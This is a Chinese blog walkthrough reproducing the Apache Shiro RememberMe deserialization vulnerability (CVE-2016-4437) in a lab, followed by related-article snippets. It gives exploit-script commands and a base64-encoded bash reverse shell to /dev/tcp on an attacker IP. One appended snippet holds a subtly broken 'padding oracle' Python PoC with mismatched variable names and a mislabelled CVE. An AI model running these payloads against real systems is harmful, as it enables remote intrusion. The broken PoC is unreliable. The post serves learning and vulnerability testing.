Apache shiro反序列化(CVE-2016-4437)复现

已于 2022-07-09 17:16:12 修改
阅读量937 收藏 2
点赞数
文章标签: apache
于 2022-07-09 17:14:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_49848824/article/details/125696118
版权

一、原理分析

Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问

Shiro会对cookie中的Remember me字段进行相关处理:序列化-->AES加密-->base64编码

由于Shiro本身含有一个预设的AES密钥Base64.decode("KPHblxk5D2deZilxcaaaA=="),每个人都能够通过源代码拿到该密钥,因此攻击者可以构造一个恶意的对象,对其进行序列化并用该密钥进行加密,base64编码,最后作为cookie中的Remember me字段发送。Shiro得到该Remember me字段后进行解码解密并且反序列化,进而导致任意命令执行

影响版本:Apache Shiro <= 1.2.4

二、环境准备

1、https://vulfocus.cn/平台搜索:shiro-cve_2016_4437,启动环境

2、一台公网服务器(没有的可以自己找环境搭建一个本地的环境)

3、利用脚本及ysoserial.jar下载地址:https://github.com/insightglacier/Shiro_exploit,脚本中的所有sleep都把他注释掉,不然可能会很慢。

三、漏洞复现

1、访问环境

2、用默认root账号密码登录,记得勾选上Remember Me

3、可以先用脚本测试下是否存在漏洞,脚本中也列出了比较多的key,可以测试出是采用了哪个key

python3 shiro_exploit.py -u http://123.58.224.8:42716

最终测试出,存在该漏洞,采用的key是 kPH+bIxk5D2deZiIxcaaaA==

又到了令人兴奋的利用环节了

先启动监听

再打开一个新的shell窗口,执行:

python3 shiro_exploit.py -t 3 -u http://123.58.224.8:30771/ -p "bash -c {echo,YmFzaCAt ************************************************JjE=}|{base64,-d}|{bash,-i}"

其中-u后面跟的是目标地址,-p后面是bash反弹shell的一种base64加密后的写法,里面echo后面的那串base64字符就是bash -i >& /dev/tcp/192.168.137.120/8888 0>&1经过base64加密后的

执行后过会儿就可以看到shell反弹过来了

四、参考链接

1、https://blog.youkuaiyun.com/weixin_42019588/article/details/113395928

2、https://www.freebuf.com/vuls/284529.html

3、https://zhuanlan.zhihu.com/p/389768500

Widen丶丶
关注
【漏洞复现shiro 反序列化CVE-2016-4437
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 789
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。...
复现xray——CVE-2016-4437(shiro反序列化漏洞)
记录并分享学习安全的知识点..
01-17 1078
一、漏洞介绍 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过程:命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值 在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Pa
Apache Shiro 1.2.4反序列化漏洞复现
DXfighting_的博客
04-15 1739
下载使用反序列化利用工具ysoserial 项目地址:https://github.com/frohoff/ysoserial 适用maven在命令行下打包: mvn clean package -DskipTests(在项目目录下执行) 使用ysoserial生成CommonsBeanutils1的Gadget: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" &...
Apache shiro550 CVE-2016-4437复现
weixin_65582330的博客
03-20 1028
填好目标地址,然后爆破密钥,用已知的密钥库爆破,然后检测当前的利用链,再爆破利用链,利用链可以进行选择,一个不行就换下一个。apache shiro提供了登录信息保存的功能,服务器在验证用户身份的过程中有反序列化操作,这是导致漏洞的主要原因。随便输入账号密码进行抓包,可以看到有rememberme=remember-me,为shiro的特征。这时就会让服务器访问我们建立好的JRMP的服务,然后让服务器反弹连接到攻击机的7777端口。然后再手动复现一遍:下面是大概的利用方式。# 生成随机16位长度的IV。
Apache Shiro 反序列化漏洞(CVE-2016-4437
最新发布
2301_80010733的博客
04-22 294
是一个严重的安全漏洞,攻击者可以利用该漏洞通过构造恶意的序列化数据实现远程代码执行(RCE)。
Apache Shiro 反序列化漏洞复现CVE-20164437
又菜又爱倒腾的博客
10-29 1818
#Apache Shiro 反序列化漏洞(CVE-20164437)# 一、漏洞简介 Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 二、漏洞影响 影响版本 Apache Shiro <=
shiro反序列化漏洞复现CVE-2016-4437
wangzhifei1的博客
01-19 2024
Apache Shiro是一个强大且易于使用的Java安全框架,提供认证、授权、加密以及会话管理功能。CVE-2016-4437具体涉及了Apache Shiro在使用记住我(RememberMe)功能时的反序列化漏洞。
Apache Shiro java反序列化漏洞复现
YUAN
08-20 1393
Apache Shiro java反序列化漏洞复现 影响版本 Apache Shiro <= 1.2.4 环境搭建 准备环境 攻击机: Windows或者Linux (我用的是windows10 1903)、ysoserial-0.0.6-SNAPSHOT-all.jar、python环境、Java环境 **靶机:**带docker的Linux就行 靶机环境搭建 获取docker镜像 docker pull medicean/vulapps:s_shiro_1 重启docker systemctl
Apache Shiro 反序列化(CVE-2016-4437)复现
m0_48520508的博客
08-03 1731
0x01简介 这个漏洞属于java反序列化漏洞的一种,shiro是java的一个开发框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 官网漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRemember
shiro反序列化漏洞详解与复现shiro-550/CVE-2016-4437
ccccai22的博客
08-28 369
shiro反序列化漏洞(shiro-550/CVE-2016-4437
【渗透测试】-CVE-2016-4437-Shiro550漏洞复现
weixin_65311462的博客
09-13 1229
Shiro550漏洞(CVE-2016-4437)是Apache Shiro框架中的一个高危反序列化漏洞,主要影响版本为1.2.4及以前版本。该漏洞允许攻击者通过RememberMe功能实现远程代码执行(RCE)。及时更新Apache Shiro框架到最新版本,确保已修复该漏洞。对来自用户的输入进行严格的验证和过滤处理,以防止恶意代码的注入。使用安全的加密算法和密钥管理策略来保护敏感数据。
Shiro-550反序列化漏洞复现
LuckySec
08-23 4729
PS:欢迎访问我的个人博客 http://luckyzmj.cn 0x01 漏洞简介 Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 影响版本 Shiro <= 1.2.4 0
shiro CVE-2016-4437 漏洞复现
qq_40646572的博客
05-09 1055
shiro550漏洞,漏洞点就在于用户信息反序列化可利用,并且加密的key值给了一个固定的默认值的,导致很多开发人员直接使用,接着导致了洞的产生。
shiro550-cve-2016-4437复现
google20的博客
03-07 1050
shiro550漏洞,idea远程调试docker里的jar
Shiro反序列化原理及完整复现流程(Shiro-550/Shiro-721)
Continuejww的博客
09-27 1374
Apache Shiro是一个强大且易用的**Java安全框架,**能够用于身份验证、授权、加密和会话管理。Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。
shiro框架反序列化漏洞(CVE-2016-4437)复现
weixin_60830484的博客
04-17 313
Apache Shiro是一个强大且易用的Java安全框架,它执行身份验证、授权、密码和会话管理,提供了一套完整的、通用的安全认证框架。
shiro反序列化漏洞复现
m0_67391683的博客
08-24 527
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。
shiro-cve_2016_4437漏洞复现
fairy1016的博客
07-20 613
漏洞概述: 该漏洞发布于2016年6月,属于java反序列化漏洞的一种,Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操
Apache Shiro-550 反序列化漏洞复现
ZXT02的博客
03-29 1383
Apache Shiro550反序列化(CVE-2016-4437)漏洞分析、复现及修复。
shiro反序列化复现
03-11
### 关于Apache Shiro 反序列化漏洞复现 对于Apache Shiro存在过的反序列化漏洞,特别是Shiro-721 (CVE-2016-4437),其主要问题是由于`rememberMe`功能中的cookie处理不当所引起的。当应用程序启用了此特性并配置了不安全的默认设置时,攻击者可以构造恶意输入来触发Java对象的反序列化进程,在特定条件下执行任意代码。 要重现该漏洞的影响,通常需要满足以下几个条件: - 应用程序使用了易受攻击版本的Apache Shiro库。 - `rememberMe`选项被启用,并且客户端能够控制发送给服务器端的身份认证Cookie值。 - 攻击者拥有对目标环境的有效了解,比如知道使用的类加载器路径或者JVM参数等细节信息[^1]。 下面是一个简化版的概念验证(PoC)流程用于说明如何利用这个缺陷进行测试(请注意这仅限于合法授权下的安全性评估环境中): #### 准备工作 确保实验环境已安装好所需的依赖项,包括但不限于: - Java开发工具包(JDK) - Python脚本语言解释器及其相关模块如pycrypto, requests等 #### 构造恶意负载 编写Python脚本来创建一个经过特殊编码后的会话ID字符串作为HTTP请求的一部分提交给Web应用服务接口。这里涉及到几个关键技术点: - 使用Padding Oracle Attack技巧绕过HMAC校验机制; - 将精心设计好的字节数组转换成Base64格式以便嵌入到浏览器Cookies字段里; ```python from Crypto.Cipher import AES import base64 import os def padding_oracle_attack(ciphertext): """模拟padding oracle attack过程""" block_size = 16 iv = ciphertext[:block_size] prev_block = iv plaintext_blocks = [] for i in range(len(ciphertext)//block_size - 1)[::-1]: current_cipher_block = ciphertext[i*block_size:(i+1)*block_size] intermediate_values = bytearray([0]*block_size) # 对每个byte位置尝试所有可能的情况直到找到正确的pad value为止 for j in reversed(range(block_size)): found_valid_byte = False for guess_value in range(256): modified_iv = list(iv) # 设置当前位为预期的pad number加上猜测值减去实际pad数量的结果 pad_num = block_size-j for k in range(j+1): modified_iv[k] ^= ((pad_num ^ intermediate_values[j-k]) & 0xFF) modified_iv[j] ^= (((guess_value ^ pad_num))& 0xFF) forged_ciphertext = bytes(modified_iv)+current_cipher_block try: decrypt_and_check_padding(forged_ciphertext) found_valid_byte=True break except Exception as e: continue if not found_valid_byte: raise ValueError('Failed to find valid byte') intermediate_values[j]=(found_valid_byte^pad_num)&0xff decrypted_plaintext=bytes([(intermediate_values[b]^iv[b])for b in range(block_size)]) plaintext_blocks.append(decrypted_plaintext.hex()) return ''.join(reversed(plaintext_blocks)) def create_malicious_cookie(): key=b'kPH+bIxk5D2deZiIxcaaaA==' cipher=AES.new(base64.b64decode(key),AES.MODE_CBC,b'\x00'*16) malicious_payload='T(java.lang.Runtime).getRuntime().exec("touch /tmp/shell")'.encode() padded_data=malignant_payload+(chr((len(malignant_payload)%16)).encode()*(-len(malignant_payload)%16)) encrypted=cipher.encrypt(padded_data) cookie_token=f'defaultSerializedSession={base64.urlsafe_b64encode(padding_oracle_attack(encrypted)).strip(b"=").decode()}' print(cookie_token) if __name__=='__main__': create_malicious_cookie() ``` 上述代码片段展示了通过Padding Oracle Attack技术篡改加密后的session token内容的方法之一。需要注意的是这段代码仅为教学目的而准备,并不应该应用于任何非法场合。 成功运行以上脚本之后将会得到一个新的伪造cookies令牌,将其附加至向受害站点发起的新一轮访问请求头中即有可能造成远程命令注入危害后果。 重要提醒:上述操作只适用于研究学习用途,请勿滥用!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值